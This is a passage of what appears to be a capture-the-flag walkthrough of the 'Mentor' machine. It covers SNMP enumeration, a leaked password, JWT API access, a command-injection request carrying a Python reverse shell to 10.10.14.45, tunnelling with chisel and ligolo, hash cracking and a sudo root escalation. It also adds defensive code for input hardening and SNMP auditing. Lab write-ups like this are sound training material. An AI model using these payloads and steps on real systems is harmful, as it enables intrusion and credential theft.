Memory size : 783.32 MB
Memory used : 783.32 MB

Description : ["Shared memory"]
Device id : [#<SNMP::Integer:0x0000ffff7bc226f0 @value=8>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bc24bd0 @value=1024>]
Memory size : 14.76 MB
Memory used : 14.76 MB

Description : ["Swap space"]
Device id : [#<SNMP::Integer:0x0000ffff7bb9a980 @value=10>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bb98c48 @value=1024>]
Memory size : 512.00 MB
Memory used : 0 bytes

Description : ["Available memory"]
Device id : [#<SNMP::Integer:0x0000ffff7bbd9bf8 @value=11>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bbdfe68 @value=1024>]
Memory size : 3.03 GB
Memory used : 0 bytes

Description : ["/run"]
Device id : [#<SNMP::Integer:0x0000ffff7bbe2de8 @value=35>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bbe1100 @value=4096>]
Memory size : 388.98 MB
Memory used : 1.71 MB

Description : ["/"]
Device id : [#<SNMP::Integer:0x0000ffff7baebea8 @value=36>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7baea170 @value=4096>]
Memory size : 8.10 GB
Memory used : 5.34 GB

Description : ["/dev/shm"]
Device id : [#<SNMP::Integer:0x0000ffff7baed0a0 @value=38>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bb3b3e0 @value=4096>]
Memory size : 1.90 GB
Memory used : 0 bytes

Description : ["/run/lock"]
Device id : [#<SNMP::Integer:0x0000ffff7bb3e270 @value=39>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bb3c628 @value=4096>]
Memory size : 5.00 MB
Memory used : 0 bytes

Description : ["/boot"]
Device id : [#<SNMP::Integer:0x0000ffff7bb6f500 @value=54>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7bb6d868 @value=4096>]
Memory size : 344.52 MB
Memory used : 244.35 MB

Description : ["/run/snapd/ns"]
Device id : [#<SNMP::Integer:0x0000ffff7b8487a0 @value=55>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x0000ffff7b84ead8 @value=4096>]
Memory size : 388.98 MB
Memory used : 1.71 MB


[*] File system information:

Index : noSuchInstance
Mount point : noSuchInstance
Access : noSuchInstance
Bootable : noSuchInstance

[*] Device information:

Id Type Status Descr
196608 unknown running AuthenticAMD: AMD EPYC 7313P 16-Core Processor
196609 unknown running AuthenticAMD: AMD EPYC 7313P 16-Core Processor
262145 unknown running network interface lo
262146 unknown running network interface eth0
262147 unknown running network interface br-7d5c72654da7
262148 unknown running network interface br-a8a89c3bf6ff
262149 unknown running network interface docker0
262150 unknown running network interface br-028c7a43f929
262151 unknown running network interface br-24ddaa1f3b47
262152 unknown running network interface br-3d63c18e314d
262154 unknown running network interface vethd75eef7
262156 unknown running network interface veth7c0935f
262158 unknown running network interface vethbd6a9fa
786432 unknown unknown Guessing that there's a floating point co-processor

[*] Software components:

Index Name
1 adduser_3.118ubuntu5_all
2 amd64-microcode_3.20191218.1ubuntu2_amd64
3 apache2_2.4.52-1ubuntu4.2_amd64
.......
714 zlib1g-dev_1:1.2.11.dfsg-2ubuntu9.2_amd64
715 zstd_1.4.8+dfsg-3build1_amd64

13. A password is found in the process listing

2131                  runnable              login.py              /usr/bin/python3      /usr/local/bin/login.py kj23sadkj123as0-d213

14. Combining the password found here with the API site's endpoints, after some testing the login succeeds and returns an Authorization value

POST /auth/login HTTP/1.1
Host: api.mentorquotes.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104

{
"email": "james@mentorquotes.htb",
"username": "james",
"password": "kj23sadkj123as0-d213"
}


HTTP/1.1 200 OK
Date: Sun, 26 May 2024 08:06:33 GMT
Server: uvicorn
content-length: 154
content-type: application/json
Connection: close

"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0"

15. With this value, all account information in the system can be retrieved

GET /users/ HTTP/1.1
Host: api.mentorquotes.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 201 Created
Date: Sun, 26 May 2024 08:08:37 GMT
Server: uvicorn
content-length: 127
content-type: application/json
Connection: close

[{"id":1,"email":"james@mentorquotes.htb","username":"james"},{"id":2,"email":"svc@mentorquotes.htb","username":"service_acc"}]

16. From the process listing and the site itself we know this is a Python-based service, and one endpoint has a command execution vulnerability; below, that vulnerability is used to obtain an initial reverse shell

POST /admin/backup HTTP/1.1
Host: api.mentorquotes.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lc0BtZW50b3JxdW90ZXMuaHRiIn0.peGpmshcF666bimHkYIBKQN7hj5m785uKcjwbD--Na0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 154

{"path":";python -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.45\",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"}

HTTP/1.1 200 OK
Date: Sun, 26 May 2024 08:13:08 GMT
Server: uvicorn
content-length: 16
content-type: application/json
Connection: close

{"INFO":"Done!"}

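The request above shows the `path` field being interpreted by a shell. As an added example (not the Mentor API's own code, whose handler the writeup does not show), the block below reconstructs the likely vulnerable pattern as a hypothetical function and places the hardened version next to it; `BACKUP_ROOT`, `ARCHIVE` and the allowlist regex are assumptions.

```python
"""Added example, not code from the Mentor API: the injection pattern behind
the /admin/backup request above, beside a hardened replacement.

The real handler is not shown in the writeup; vulnerable_backup_command() is a
hypothetical reconstruction that matches the observed behaviour (a JSON
"path" field, and a value starting with ';' running a second command)."""
import os
import re
import subprocess

BACKUP_ROOT = "/app"                     # assumption: only the app tree may be archived
ARCHIVE = "/tmp/backup.tar.gz"           # assumption: fixed archive location
SAFE_PATH = re.compile(r"^[A-Za-z0-9._/-]+$")   # conservative allowlist for path names


def vulnerable_backup_command(path: str) -> str:
    """Vulnerable pattern: request data pasted into a shell command line.
    Run with subprocess.run(cmd, shell=True) (or os.system), a ';' in 'path'
    terminates the tar command and whatever follows runs as a new command."""
    return f"tar -czf {ARCHIVE} {path}"


def why_rejected(path: str) -> str:
    """Return the reason a backup path is refused, or '' when it is acceptable."""
    if not isinstance(path, str) or not path:
        return "path must be a non-empty string"
    if not SAFE_PATH.match(path):
        return "path contains characters outside [A-Za-z0-9._/-]"
    if path.startswith("/"):
        return "absolute paths are not allowed"
    rel = os.path.normpath(path)
    if rel == ".." or rel.startswith("../"):
        return "path escapes the backup root"
    return ""


def safe_backup_argv(path: str) -> list:
    """Hardened pattern: validate, then build an argv list. Without a shell
    there is nothing to interpret ';', '$()' or backticks, and -C confines
    tar to BACKUP_ROOT so '..' cannot pull in files from elsewhere."""
    reason = why_rejected(path)
    if reason:
        raise ValueError(reason)
    return ["tar", "-czf", ARCHIVE, "-C", BACKUP_ROOT, "--", os.path.normpath(path)]


def run_backup(path: str) -> int:
    """Execute the hardened command (shell=False); returns tar's exit status."""
    return subprocess.run(safe_backup_argv(path), check=False).returncode


if __name__ == "__main__":
    injected = ";python -c 'print(1)'"   # same shape as the page's payload, harmless body
    print("shell string the vulnerable handler would run:")
    print("  " + vulnerable_backup_command(injected))
    print("hardened handler:", why_rejected(injected))
    print("hardened handler:", safe_backup_argv("app/db.py"))
```

The `-V`-style fix is two-fold: the argv list removes the shell that gave `;` its meaning, and the path checks stop the endpoint from archiving files outside the application directory even without injection.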
17. Initial foothold obtained

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.193] 38522
/app # 88R8R
8R8R
sh: 8R8R: not found
/app # ;;8R;8Rid
;8R;8Rid
sh: syntax error: unexpected ";"
/app # iid
id
sh: 8id: not found
/app # wwhoami
whoami
root
/app # ;8R;8R

18. This shell has some issues, so we drop the prefix in front of the listener (rlwrap)

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.193] 43822
/app #

/app # whoaim
whoaim
sh: whoaim: not found
/app # whoami
whoami
root
/app #

19. Upgrade to a full shell environment

/app # ^Z      
zsh: suspended nc -lvnp 443

┌──(kali㉿offsec)-[~/Desktop]
└─$ stty raw -echo; fg
[1] + continued nc -lvnp 443
reset


/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/app #

20. The first flag is obtained here

/app # ls la /home
ls: la: No such file or directory
/home:
svc
/app # cd /home/svc
/home/svc # ls -la
total 28
drwxr-x--- 4 1001 1001 4096 Nov 11 2022 .
drwxr-xr-x 1 root root 4096 Nov 10 2022 ..
lrwxrwxrwx 1 root root 9 Nov 10 2022 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 3771 Jun 7 2022 .bashrc
drwx------ 3 1001 1001 4096 Jun 12 2022 .cache
drwxrwxr-x 5 1001 1001 4096 Jun 12 2022 .local
-rw-r--r-- 1 1001 1001 807 Jun 7 2022 .profile
-rw-r----- 1 root 1001 33 May 26 03:26 user.txt
/home/svc # cat user.txt
517fdda016586a10cfc706f184adc76a
/home/svc #

0x02 Obtaining system privileges

21. Initial assessment: this looks like a container environment

/home/svc # cat /proc/1/environ
PATH=/home/svc/.local/bin:/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=58de9fcf2b6aADMIN_USER=jamesADMIN_EMAIL=james@mentorquotes.htbSECRET=76dsf761g31276hjgsdkahuyt123WORK_DIR=/app/LANG=C.UTF-8GPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421DPYTHON_VERSION=3.6.9PYTHON_PIP_VERSION=19.3.1PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/ffe826207a010164265d9cc807978e3604d18ca0/get-pip.pyPYTHON_GET_PIP_SHA256=b86f36cc4345ae87bfd4f10ef6b2dbfa7a872fbff70608a1e43944d283fd0eeeHOME=/home/svc/home/svc #
/home/svc # find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null
-rwxr-xr-x 1 root root 0 May 26 03:26 /.dockerenv
/home/svc #

22. It is a Docker container

/home/svc # ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:16:00:03
inet addr:172.22.0.3 Bcast:172.22.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:676130 errors:0 dropped:0 overruns:0 frame:0
TX packets:455639 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:100589012 (95.9 MiB) TX bytes:64601178 (61.6 MiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

/home/svc #

23. Since the IP address does not match the target's either, start going through the container's internal files

/home/svc # cd /app
/app # ls -la
total 24
drwxr-xr-x 1 root root 4096 Nov 10 2022 .
drwxr-xr-x 1 root root 4096 May 26 03:26 ..
-rw-r--r-- 1 root root 1024 Jun 12 2022 .Dockerfile.swp
-rw-r--r-- 1 root root 522 Nov 3 2022 Dockerfile
drwxr-xr-x 1 root root 4096 Nov 10 2022 app
-rw-r--r-- 1 root root 672 Jun 4 2022 requirements.txt
/app # cat Dockerfile
FROM python:3.6.9-alpine

RUN apk --update --upgrade add --no-cache gcc musl-dev jpeg-dev zlib-dev libffi-dev cairo-dev pango-dev gdk-pixbuf-dev

WORKDIR /app
ENV HOME /home/svc
ENV PATH /home/svc/.local/bin:${PATH}
RUN python -m pip install --upgrade pip --user svc
COPY requirements.txt requirements.txt
RUN pip install -r requirements.txt
RUN pip install pydantic[email] pyjwt
EXPOSE 8000
COPY . .
CMD ["python3", "-m", "uvicorn", "app.main:app", "--reload", "--workers", "100", "--host", "0.0.0.0", "--port" ,"8000"]
/app #


/app # ls -la app/
total 28
drwxr-xr-x 1 root root 4096 Nov 10 2022 .
drwxr-xr-x 1 root root 4096 Nov 10 2022 ..
-rw-r--r-- 1 root root 0 Jun 4 2022 __init__.py
drwxr-xr-x 1 root root 4096 Nov 10 2022 __pycache__
drwxr-xr-x 1 root root 4096 Nov 10 2022 api
-rw-r--r-- 1 root root 0 Jun 4 2022 config.py
-rw-r--r-- 1 root root 1001 Jun 7 2022 db.py
-rw-r--r-- 1 root root 1149 Jun 4 2022 main.py
-rw-r--r-- 1 root root 704 Jun 4 2022 requirements.txt
/app #


/app # cat app/config.py
/app # cat app/db.py
import os

from sqlalchemy import (Column, DateTime, Integer, String, Table, create_engine, MetaData)
from sqlalchemy.sql import func
from databases import Database

# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")

# SQLAlchemy for quotes
engine = create_engine(DATABASE_URL)
metadata = MetaData()
quotes = Table(
"quotes",
metadata,
Column("id", Integer, primary_key=True),
Column("title", String(50)),
Column("description", String(50)),
Column("created_date", DateTime, default=func.now(), nullable=False)
)

# SQLAlchemy for users
engine = create_engine(DATABASE_URL)
metadata = MetaData()
users = Table(
"users",
metadata,
Column("id", Integer, primary_key=True),
Column("email", String(50)),
Column("username", String(50)),
Column("password", String(128) ,nullable=False)
)


# Databases query builder
database = Database(DATABASE_URL)

/app #

24. The app connects to a database, so that port needs to be forwarded out; upload the chisel tool and set up port forwarding, here using the reverse-tunnel method

/app # cd /tmp
/tmp # ls -la
total 8
drwxrwxrwt 1 root root 4096 May 26 03:26 .
drwxr-xr-x 1 root root 4096 May 26 03:26 ..
/tmp # wget 10.10.14.45/chisel_1.9.1_linux_amd64
Connecting to 10.10.14.45 (10.10.14.45:80)
chisel_1.9.1_linux_a 100% |********************************| 8452k 0:00:00 ETA
/tmp # ./chisel_1.9.1_linux_amd64 client 10.10.14.45:12345 R:5432:172.22.0.1:5432
sh: ./chisel_1.9.1_linux_amd64: Permission denied
/tmp # chmod +x ./chisel_1.9.1_linux_amd64
/tmp # ./chisel_1.9.1_linux_amd64 client 10.10.14.45:12345 R:5432:172.22.0.1:5432
2024/05/26 08:37:20 client: Connecting to ws://10.10.14.45:12345
2024/05/26 08:37:21 client: Connected (Latency 137.256932ms)

┌──(kali㉿offsec)-[~/Desktop/tools/chisel]
└─$ ./chisel_1.9.1_linux_arm64 server -p 12345 --reverse
2024/05/26 16:36:38 server: Reverse tunnelling enabled
2024/05/26 16:36:38 server: Fingerprint EqPvfVEYt88pTbPCpS8eGptqwlV2oyH/7GcH3FYNXMQ=
2024/05/26 16:36:38 server: Listening on http://0.0.0.0:12345
2024/05/26 16:43:02 server: session#1: tun: proxy#R:5432=>172.22.0.1:5432: Listening

25. With the port forward in place, connect to the database locally and have a look

┌──(kali㉿offsec)-[~/Desktop]
└─$ psql -h 127.0.0.1 -p 5432 -U postgres
用户 postgres 的口令:
psql (16.1 (Debian 16.1-1), 服务器 13.7 (Debian 13.7-1.pgdg110+1))
输入 "help" 来获取帮助信息.

postgres=# SELECT * FROM mentorquotes_db;
ERROR: relation "mentorquotes_db" does not exist
1行SELECT * FROM mentorquotes_db;
^
postgres=# \l
数据库列表
名称 | 拥有者 | 字元编码 | Locale Provider | 校对规则 | Ctype | ICU Locale | ICU Rules | 存取权限
-----------------+----------+----------+-----------------+------------+------------+------------+-----------+-----------------------
mentorquotes_db | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | |
postgres | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | |
template0 | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | | =c/postgres +
| | | | | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | libc | en_US.utf8 | en_US.utf8 | | | =c/postgres +
| | | | | | | | postgres=CTc/postgres
(4 行记录)

postgres=# \c mentorquotes_db
psql (16.1 (Debian 16.1-1), 服务器 13.7 (Debian 13.7-1.pgdg110+1))
您现在已经连接到数据库 "mentorquotes_db",用户 "postgres".
mentorquotes_db=# \dt
关联列表
架构模式 | 名称 | 类型 | 拥有者
----------+----------+--------+----------
public | cmd_exec | 数据表 | postgres
public | quotes | 数据表 | postgres
public | users | 数据表 | postgres
(3 行记录)

mentorquotes_db=# select * from users
mentorquotes_db-# ;
id | email | username | password
----+------------------------+-------------+----------------------------------
1 | james@mentorquotes.htb | james | 7ccdcd8c05b59add9c198d492b36a503
2 | svc@mentorquotes.htb | service_acc | 53f22d0dfa10dce7e29cd31f4f953fd8
(2 行记录)

mentorquotes_db=#

26. Crack the discovered password hashes

https://crackstation.net/

123meunomeeivani

27. Try logging in; this time the login lands on the host machine

┌──(kali㉿offsec)-[~/Desktop]
└─$ sshpass -p '123meunomeeivani' ssh svc@10.10.11.193
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-56-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun May 26 08:47:32 AM UTC 2024

System load: 0.0
Usage of /: 66.1% of 8.09GB
Memory usage: 16%
Swap usage: 0%
Processes: 250
Users logged in: 0
IPv4 address for br-028c7a43f929: 172.20.0.1
IPv4 address for br-24ddaa1f3b47: 172.19.0.1
IPv4 address for br-3d63c18e314d: 172.21.0.1
IPv4 address for br-7d5c72654da7: 172.22.0.1
IPv4 address for br-a8a89c3bf6ff: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.11.193
IPv6 address for eth0: dead:beef::250:56ff:feb9:495a

=> There are 5 zombie processes.


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Dec 12 10:22:58 2022 from 10.10.14.40
svc@mentor:~$ id
uid=1001(svc) gid=1001(svc) groups=1001(svc)
svc@mentor:~$

28. Enumerate for privilege escalation paths

svc@mentor:~$ sudo -l
[sudo] password for svc:
Sorry, user svc may not run sudo on mentor.
svc@mentor:~$ ls -la
total 28
drwxr-x--- 4 svc svc 4096 Nov 11 2022 .
drwxr-xr-x 4 root root 4096 Jun 10 2022 ..
lrwxrwxrwx 1 root root 9 Nov 10 2022 .bash_history -> /dev/null
-rw-r--r-- 1 svc svc 3771 Jun 7 2022 .bashrc
drwx------ 3 svc svc 4096 Jun 12 2022 .cache
drwxrwxr-x 5 svc svc 4096 Jun 12 2022 .local
-rw-r--r-- 1 svc svc 807 Jun 7 2022 .profile
-rw-r----- 1 root svc 33 May 26 03:26 user.txt
svc@mentor:~$

svc@mentor:/tmp$ wget 10.10.14.45/linpeas.sh
--2024-05-26 08:54:13-- http://10.10.14.45/linpeas.sh
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847920 (828K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh 100%[=================================================================================================>] 828.05K 25.1KB/s in 29s

2024-05-26 08:54:42 (29.0 KB/s) - ‘linpeas.sh’ saved [847920/847920]

svc@mentor:/tmp$ chmod +x ./linpeas.sh
svc@mentor:/tmp$ ./linpeas.sh


╔══════════╣ Analyzing SNMP Files (limit 70)
-rw-r--r-- 1 root root 3453 Jun 5 2022 /etc/snmp/snmpd.conf
# rocommunity: a SNMPv1/SNMPv2c read-only access community name
rocommunity public default -V systemonly
rocommunity6 public default -V systemonly
createUser bootstrap MD5 SuperSecurePassword123__ DES
-rw------- 1 Debian-snmp Debian-snmp 1268 May 26 03:26 /var/lib/snmp/snmpd.conf

29. While looking through the various configs on the box, I check the SNMPd config in /etc/snmp/snmpd.conf. It has a lot of comment lines, which I remove with grep -v "^#", and a bunch of blank lines, which I remove with grep .:

svc@mentor:~$ cd /etc/snmp
svc@mentor:/etc/snmp$ ls -la
total 20
drwxr-xr-x 3 root root 4096 Nov 10 2022 .
drwxr-xr-x 108 root root 4096 Dec 5 2022 ..
-rw-r--r-- 1 root root 511 Jun 5 2022 snmp.conf
-rw-r--r-- 1 root root 3453 Jun 5 2022 snmpd.conf
drwxr-xr-x 2 root root 4096 Apr 21 2022 snmpd.conf.d
svc@mentor:/etc/snmp$ cat snmpd.conf | grep -v "^#" | grep .
sysLocation Sitting on the Dock of the Bay
sysContact Me <admin@mentorquotes.htb>
sysServices 72
master agentx
agentAddress udp:161,udp6:[::1]:161
view systemonly included .1.3.6.1.2.1.1
view systemonly included .1.3.6.1.2.1.25.1
rocommunity public default -V systemonly
rocommunity6 public default -V systemonly
rouser authPrivUser authpriv -V systemonly
includeDir /etc/snmp/snmpd.conf.d
createUser bootstrap MD5 SuperSecurePassword123__ DES
rouser bootstrap priv
com2sec AllUser default internal
group AllGroup v2c AllUser
view SystemView included .1.3.6.1.2.1.25.1.1
view AllView included .1
access AllGroup "" any noauth exact AllView none none
svc@mentor:/etc/snmp$

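The cleaned listing above contains every directive that made this box fall: an SNMPv3 `createUser` line with its passphrase in cleartext, the default `public` community, and a v2c community (`internal`) granted `noauth` access to the whole tree (`.1`) despite the `-V systemonly` restriction on the others. As an added example, not part of the writeup, the block below audits that config text for exactly those patterns; the finding codes and the directive sample (copied from the listing above) are my own construction.

```python
"""Added example, not part of the writeup: a small audit of the snmpd.conf
directives shown above. It flags SNMPv3 credentials left in cleartext,
default community strings, and a v2c community granted unauthenticated
access to the whole MIB tree."""
import shlex

# Directive lines from the writeup's /etc/snmp/snmpd.conf listing
# (comments and blank lines already stripped, as the grep pipeline did).
SNMPD_CONF = """\
view systemonly included .1.3.6.1.2.1.1
view systemonly included .1.3.6.1.2.1.25.1
rocommunity public default -V systemonly
rocommunity6 public default -V systemonly
rouser authPrivUser authpriv -V systemonly
createUser bootstrap MD5 SuperSecurePassword123__ DES
rouser bootstrap priv
com2sec AllUser default internal
group AllGroup v2c AllUser
view SystemView included .1.3.6.1.2.1.25.1.1
view AllView included .1
access AllGroup "" any noauth exact AllView none none
"""


def parse_snmpd_conf(text):
    """Return (directive, args) pairs; '#' comments and blank lines are skipped."""
    out = []
    for raw in text.splitlines():
        parts = shlex.split(raw, comments=True)      # keeps "" as an empty argument
        if parts:
            out.append((parts[0].lower(), parts[1:]))
    return out


def audit_snmpd(text):
    """Return the set of finding codes for the given snmpd.conf text."""
    findings, full_views, sec_by_group, comm_by_sec = set(), set(), {}, {}
    entries = parse_snmpd_conf(text)
    for d, a in entries:
        if d == "createuser" and len(a) >= 3:
            # createUser NAME AUTHPROTO PASSPHRASE [PRIVPROTO [PASSPHRASE]]
            if not a[2].startswith("-"):             # -m/-l forms carry hashed keys instead
                findings.add("CLEARTEXT_USM_CREDS")
            if a[1].upper() == "MD5" or (len(a) > 3 and a[3].upper() == "DES"):
                findings.add("WEAK_USM_ALGOS")
        elif d in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"):
            if a and a[0].lower() in ("public", "private"):
                findings.add("DEFAULT_COMMUNITY")
        elif d == "view" and len(a) >= 3 and a[1] == "included" and a[2] == ".1":
            full_views.add(a[0])                     # a view exposing the entire tree
        elif d == "com2sec" and len(a) >= 3:
            comm_by_sec[a[0]] = a[2]                 # security name -> community string
        elif d == "group" and len(a) >= 3:
            sec_by_group.setdefault(a[0], []).append(a[2])
    for d, a in entries:
        # access GROUP CONTEXT MODEL LEVEL PREFIX READ WRITE NOTIFY
        if d == "access" and len(a) >= 6 and a[3] == "noauth" and a[5] in full_views:
            if any(sec in comm_by_sec for sec in sec_by_group.get(a[0], [])):
                findings.add("FULL_TREE_NOAUTH")     # community string reaches view .1
    return findings


if __name__ == "__main__":
    for code in sorted(audit_snmpd(SNMPD_CONF)):
        print("finding:", code)
```

The fourth finding is the one the `-V systemonly` lines hide: a reader who only checks the `rocommunity` entries misses that `com2sec`/`group`/`access` hand the `internal` community the full tree without authentication.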
30. A password is found here; try switching to that account

svc@mentor:~$ su - james
Password:
james@mentor:~$ id
uid=1000(james) gid=1000(james) groups=1000(james)
james@mentor:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on mentor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User james may run the following commands on mentor:
(ALL) /bin/sh
james@mentor:~$

31. This account has sudo rights, so privilege escalation is direct

james@mentor:~$ sh -p
$ id
uid=1000(james) gid=1000(james) groups=1000(james)
$ exit
james@mentor:~$ sudo sh -p
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
fb595e84e28f00e0d1e6953d269cc26d
#

32. As a supplement, an example of port forwarding with ligolo-ng

┌──(kali㉿offsec)-[~/Desktop/tools/ligolo/ligolo-ng_proxy_0.5.1_linux_arm64]
└─$ sudo ip tuntap add user kali mode tun ligolo
[sudo] kali 的密码:

┌──(kali㉿offsec)-[~/Desktop/tools/ligolo/ligolo-ng_proxy_0.5.1_linux_arm64]
└─$ sudo ip link set ligolo up

┌──(kali㉿offsec)-[~/Desktop/tools/ligolo/ligolo-ng_proxy_0.5.1_linux_arm64]
└─$ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!

ligolo-ng » INFO[0475] Agent joined. name=root@58de9fcf2b6a remote="10.10.11.193:34570"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - #1 - root@58de9fcf2b6a - 10.10.11.193:34570
[Agent : root@58de9fcf2b6a] » start
[Agent : root@58de9fcf2b6a] » INFO[0516] Starting tunnel to root@58de9fcf2b6a
[Agent : root@58de9fcf2b6a] »
[Agent : root@58de9fcf2b6a] » ifconfig
┌─────────────────────────────────────┐
│ Interface 0
├──────────────┬─────────────────────┤
│ Name │ lo │
│ Hardware MAC │ │
│ MTU │ 65536
│ Flags │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8
└──────────────┴─────────────────────┘
┌────────────────────────────────────────────────┐
│ Interface 1
├──────────────┬────────────────────────────────┤
│ Name │ eth0 │
│ Hardware MAC │ 02:42:ac:16:00:03
│ MTU │ 1500
│ Flags │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.22.0.3/16
└──────────────┴────────────────────────────────┘
[Agent : root@58de9fcf2b6a] »
[Agent : root@58de9fcf2b6a] » stop
[Agent : root@58de9fcf2b6a] » INFO[0834] Closing tunnel to root@58de9fcf2b6a...
[Agent : root@58de9fcf2b6a] »
[Agent : root@58de9fcf2b6a] » start
[Agent : root@58de9fcf2b6a] » INFO[0954] Starting tunnel to root@58de9fcf2b6a
[Agent : root@58de9fcf2b6a] »
[Agent : root@58de9fcf2b6a] »



/tmp # wget 10.10.14.45/agent
Connecting to 10.10.14.45 (10.10.14.45:80)
agent 100% |********************************| 4572k 0:00:00 ETA
/tmp # chmod + /agent
chmod: /agent: No such file or directory
/tmp # chmod + ./agent
/tmp # .\agent -connect 10.10.14.45:11601 -ignore-cert
sh: .agent: not found
/tmp # ls -la
total 13036
drwxrwxrwt 1 root root 4096 May 26 08:59 .
drwxr-xr-x 1 root root 4096 May 26 03:26 ..
-rw-r--r-- 1 root root 4681728 May 26 09:02 agent
-rwxr-xr-x 1 root root 8654848 May 26 08:35 chisel_1.9.1_linux_amd64
/tmp # ./agent -connect 10.10.14.45:11601 -ignore-cert
sh: ./agent: Permission denied
/tmp # chmod +x ./agent
/tmp # ls -la
total 13036
drwxrwxrwt 1 root root 4096 May 26 08:59 .
drwxr-xr-x 1 root root 4096 May 26 03:26 ..
